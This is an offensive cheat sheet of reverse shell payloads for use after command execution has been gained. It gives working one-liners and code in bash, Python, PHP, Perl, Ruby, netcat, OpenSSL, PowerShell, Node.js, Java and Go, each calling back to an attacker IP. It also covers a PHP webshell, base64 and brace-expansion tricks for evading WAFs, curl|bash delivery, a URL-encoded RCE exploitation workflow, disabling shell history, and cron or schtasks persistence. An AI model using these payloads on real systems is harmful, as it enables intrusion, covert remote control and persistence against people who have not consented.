Reverse Shell Arsenal — The Hacker’s Voice from the Void


When you gain command execution on a target, the next step is almost always the same: establish a shell, a connection from their machine back to yours. A reverse shell is your lifeline for interactive control and the starting point for privilege escalation, persistence and lateral movement. This section is a playbook of cross-language, cross-platform reverse shell payloads, encoding and evasion tactics, and stabilization techniques. Throughout, 10.10.14.2:4444 stands for the attacker IP and listener port; substitute your own.


I. 🧩 Core Concepts

  • Reverse Shell: the victim connects back to a listener on your attacker machine. Works through NAT and most egress filtering, because the victim only needs an outbound connection.

  • Bind Shell: the victim listens on a port and you connect in. Needs an inbound port the firewall lets through, so it is blocked far more often and shows up in port scans and netstat output.

  • Staged vs. Stageless: staged = a small loader that fetches the full payload from you at runtime (tiny first stage, but a second network fetch to spot); stageless = the full payload delivered in one go.

  • TTY Stabilization: upgrading a raw, line-oriented shell (no job control, no tab completion, Ctrl+C kills the session) to a full interactive terminal.


II. ⚙️ Preparation

🧠 Attacker Setup

# Netcat listener
nc -lvnp 4444

# Alternative (for TLS)
ncat --ssl -lvnp 4444

⚙️ Common Ports

  • 4444 → Metasploit's default LPORT and the port every cheat sheet uses, which also makes it the first one defenders alert on

  • 80 / 443 → egress is almost always allowed; blends with HTTP/HTTPS, and with a TLS listener on 443 the session looks like ordinary HTTPS on the wire

  • 53 → DNS; often allowed out, but a long-lived TCP session to port 53 does not look like DNS to anyone inspecting it

  • 1337 → CTF favorite


III. 🧬 Bash Reverse Shells

💣 Classic

bash -i >& /dev/tcp/10.10.14.2/4444 0>&1

/dev/tcp is a bash feature, not a real device node, and >& file is bash redirection syntax, so this only works when bash is the interpreter running the line.

🧠 Short One-Liner

exec 196<>/dev/tcp/10.10.14.2/4444; sh <&196 >&196 2>&196

Opens the socket read/write on descriptor 196 (any high fd works) and hands it to sh as stdin, stdout and stderr. The widely copied version prefixes this with an extra 0<&196; which only prints "Bad file descriptor" because fd 196 is not open yet.

⚙️ Using /bin/sh

bash -c 'sh -i >& /dev/tcp/10.10.14.2/4444 0>&1'

If /bin/sh is dash (Debian, Ubuntu), running sh -i >& /dev/tcp/... directly fails with "Bad fd number": dash has neither /dev/tcp nor the >& file form. Let bash open the socket and start sh inside it, as above, when you need a plain sh on the other end.

IV. 🐍 Python Reverse Shells

🧩 Python 2/3 Compatible

python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.14.2",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'

The code itself runs unchanged under python2 or python3; swap the interpreter name for whichever the target has. dup2 points fds 0, 1 and 2 at the socket and pty.spawn gives the shell a pseudo-terminal from the start, so this one arrives already half stabilized.

🧠 Base64-Wrapped (for WAF bypass)

echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cyA9IHNvY2tldC5zb2NrZXQoKTtzLmNvbm5lY3QoKCIxMC4xMC4xNC4yIiw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7cHR5LnNwYXduKCJiYXNoIikn" | base64 -d | bash

The blob decodes to the one-liner above (with three explicit os.dup2 calls instead of the list comprehension). Without the trailing | bash the decode only prints the command. The WAF sees a base64 string with no socket, /dev/tcp or python keyword in it; anything watching process command lines on the host still sees the decoded python3 -c ... once it runs.

V. 🧩 PHP Reverse Shells

💣 Simple Command

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/4444 0>&1'"); ?>

⚙️ Web Shell via File Upload

Upload this as shell.php:

<?php system($_GET['cmd']); ?>

Access:

http://target/shell.php?cmd=whoami

This is a command webshell, not a reverse shell: each request runs one command and returns its output. To turn it into a session, start your listener and pass one of the reverse shell one-liners as cmd, URL-encoded (see section XVIII for the encoded form).

🧠 PentestMonkey PHP Reverse Shell (Full)

https://github.com/pentestmonkey/php-reverse-shell

VI. 🧰 Perl Reverse Shells

perl -e 'use Socket;$i="10.10.14.2";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

VII. 🧩 Ruby Reverse Shells

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("10.10.14.2","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

exit if fork detaches the child from the calling process. Note that this variant is a command loop, not an interactive shell: each line you send is run through popen and its output returned, so cd does not persist between commands and anything interactive will hang. If you need a real tty, use the Perl or Python form instead.

VIII. 🧠 Netcat Reverse Shells

💣 Basic

nc -e /bin/bash 10.10.14.2 4444

-e needs a netcat build that has it (nc.traditional, ncat). The OpenBSD netcat that Debian and Ubuntu install as nc has no -e at all, which is why the next form exists.

🧩 For Netcat without -e

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.2 4444 > /tmp/f

The FIFO closes the loop: nc writes whatever you send into /tmp/f, cat feeds it to sh, and sh's output (stderr merged in) goes back out through nc.

⚙️ Encrypted with OpenSSL

The two halves run on different machines. (The original single line piped s_client into sh and then into s_server on the same host, which connects nothing to anything.)

Attacker, generate a throwaway certificate and listen:

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes -subj "/CN=localhost"
openssl s_server -quiet -key key.pem -cert cert.pem -port 443

Victim:

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.10.14.2:443 > /tmp/s; rm /tmp/s

On the wire this is a TLS session to port 443, so a network sensor sees something HTTPS-shaped rather than shell commands in the clear. The certificate is self-signed and s_client does not verify it, so nothing on the victim needs to trust it.

IX. 🧬 PowerShell Reverse Shells (Windows)

🧠 One-Liner

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.2',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}"

⚙️ Encoded Command

powershell -EncodedCommand <base64_payload>

Generate (from Linux; the script must be UTF-16LE before base64, since base64 of UTF-8 decodes to garbage, and -w0 stops base64 from wrapping lines):

echo -n "payload" | iconv --to-code UTF-16LE | base64 -w0

Treat this as a quoting convenience, not AV evasion. PowerShell decodes the argument before AMSI scans the script, and Script Block Logging (event ID 4104) records the decoded content; the -EncodedCommand switch on a command line is itself a common hunting indicator.

X. 🧠 Windows CMD Reverse Shells

cmd.exe has no socket API of its own. A "CMD reverse shell" is either a dropped nc.exe with -e cmd.exe, or the section IX PowerShell one-liner launched from cmd, which is what you need when the injection point runs under cmd.exe (a batch file, a web app calling cmd /c):

cmd.exe /c powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.2',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}"

XI. 🧩 Node.js Reverse Shells

// Save as shell.js and run it with node shell.js, or inline it with node -e "...".
var net = require('net'), cp = require('child_process');
var client = new net.Socket();
client.connect(4444, '10.10.14.2', function(){
  var sh = cp.spawn('sh', []);   // no pty here: stabilize with section XIV once connected
  client.pipe(sh.stdin);         // what you type -> shell
  sh.stdout.pipe(client);        // shell output -> you
  sh.stderr.pipe(client);        // errors too, or you will not see why commands fail
});

XII. 🧰 Java Reverse Shells

Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/10.10.14.2/4444 0>&1"});

This goes inside a method body (a JSP scriptlet, a deserialization gadget, an expression language injection). The String[] overload matters: the single-String exec tokenizes on whitespace with no shell involved, so >& and 0>&1 would reach bash -i as plain arguments instead of being interpreted as redirections.

XIII. 🧬 Golang Reverse Shell

package main

import (
	"net"
	"os/exec"
)

func main() {
	c, err := net.Dial("tcp", "10.10.14.2:4444")
	if err != nil {
		return // listener not up: exit quietly instead of running a shell on /dev/null
	}
	cmd := exec.Command("/bin/sh")
	cmd.Stdin, cmd.Stdout, cmd.Stderr = c, c, c // the socket is the shell's stdin, stdout and stderr
	cmd.Run()
}

The original imported syscall without using it, which is a compile error in Go. Compile (cross-compile from the attacker box with GOOS=linux GOARCH=amd64, or GOOS=windows with cmd.exe in place of /bin/sh; -s -w strips symbols and debug info to shrink the binary):

go build -ldflags="-s -w" -o shell shell.go

XIV. 🧩 Stabilizing a Shell (TTY Upgrade)

🧠 Linux

After getting a shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+Z
stty raw -echo; fg
reset
stty rows 50 cols 200

pty.spawn gives the remote shell a pseudo-terminal. Ctrl+Z backgrounds your listener, stty raw -echo puts your local terminal in raw mode so Ctrl+C, arrow keys and tab completion are passed through to the remote pty instead of being handled locally (or killing nc), fg brings the listener back and reset redraws the screen. Run stty -a in a normal local terminal first and use your real rows and cols, or full-screen programs will wrap badly. If python is missing, the script utility (script -qc /bin/bash /dev/null) or socat's pty option can allocate the terminal instead.

🧩 Windows

There is no TTY to upgrade. The PowerShell one-liners above are line-oriented by design (read a line, iex it, send the output back) and will not run interactive programs. For a real console use a ConPTY-based shell such as ConPtyShell, or a framework session like Meterpreter. On the target, powershell -ep bypass only lifts the execution policy for running script files and does nothing for interactivity.

XV. ⚙️ Web Delivery & Payload Hosting

🧠 Host Shells

python3 -m http.server 8000

💣 Fetch on Victim

wget http://10.10.14.2:8000/shell.sh -O /tmp/shell.sh
curl http://10.10.14.2:8000/shell.sh | bash

The wget form leaves a file on disk and still needs a bash /tmp/shell.sh afterwards; the curl | bash form runs straight from the pipe and writes nothing. Watch the http.server log: the GET tells you the target can reach you even before the shell calls back.

XVI. 🧠 Payload Obfuscation & Evasion

  • Base64 Encoding: hides the keywords (/dev/tcp, socket, nc) that string-matching WAF and IDS rules look for; the decoded command still appears in process command lines and shell audit logs on the host.

  • Variable Substitution: split the IP/port into parts (assign the octets to variables and rebuild the string) so the literal address never appears in the payload.

  • Protocol Shift: carry the channel over HTTPS, DNS or ICMP when plain outbound TCP is filtered.

  • Inline Compression: gzip

  • PowerShell Encoding: UTF-16LE + base64 is the required format for -EncodedCommand and hides the script from casual command-line review; it does not avoid Defender, because AMSI scans the decoded script block and Script Block Logging records it.

Example (base64 plus brace expansion, so the pipeline contains no spaces and no /dev/tcp string):

bash -c "{echo,YmFzaCAt...}|{base64,-d}|{bash,-i}"

The double quotes matter: without them the outer shell expands the braces itself and bash -c receives only echo as its command string. Where the injection point itself rejects spaces, inject the bare {echo,...}|{base64,-d}|{bash,-i} pipeline without the wrapper.

XVII. ⚔️ Quick Reference Table

  • Bash: bash -i >& /dev/tcp/IP/PORT 0>&1

  • Python: python3 -c 'import socket,pty,os;...

  • PHP: <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'"); ?>

  • Perl: perl -e 'use Socket;$i="IP";$p=PORT;...'

  • Ruby: ruby -rsocket -e 'exit if fork;c=TCPSocket.new("IP","PORT");...'

  • Netcat: nc -e /bin/bash IP PORT

  • PowerShell: (long one-liner, see section IX)

  • Node.js: require('net').Socket()

  • Java: Runtime.getRuntime().exec(...)

  • Go: net.Dial("tcp","IP:PORT")


XVIII. 🧩 Real-World Workflow Example

# 1. Start the listener first, so the callback has somewhere to land
nc -lvnp 4444

# 2. Exploit the web app RCE. Every space, quote, > and & in the payload is URL-encoded;
#    a bare & would end the cmd parameter. curl hangs for as long as the shell lives,
#    because system() on the target does not return; that is expected.
curl "http://target/vuln.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.2%2F4444%200%3E%261%27"

# 3. Upgrade to a TTY inside the caught shell (full sequence in section XIV)
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm

# 4. Enumerate and escalate
whoami && id && uname -a

XIX. 🧠 Pro Tips & Red Team Tricks

Shell Hardening

  • Always upgrade to an interactive shell (pty.spawn); a raw shell dies on the first Ctrl+C.

  • Disable history before doing anything: unset HISTFILE or export HISTFILE=/dev/null.

  • Encrypt the channel when possible (ncat --ssl, openssl s_server/s_client, socat); a plain-text shell is trivial to read on the wire.

Delivery

  • URL-encode spaces and special characters in one-liners sent through a web parameter; a bare & or # truncates the payload.

  • Use encoded payloads for stealth against string-matching filters (especially in web RCE); URL shorteners only help when the target fetches a stager over HTTP.

Persistence

  • A reverse shell is a session, not persistence. Schedule a second callback with a cron job or schtasks so you can reconnect if the first one dies.

Safety

  • Avoid nc -e: most netcat builds lack it, and a netcat process with a child shell is a textbook detection signature. Use the mkfifo form or a /dev/tcp shell instead.

  • Exit cleanly (exit in the remote shell, then Ctrl+C on the listener) and run stty sane locally if you used raw mode, so neither your terminal nor the target's process is left hanging.

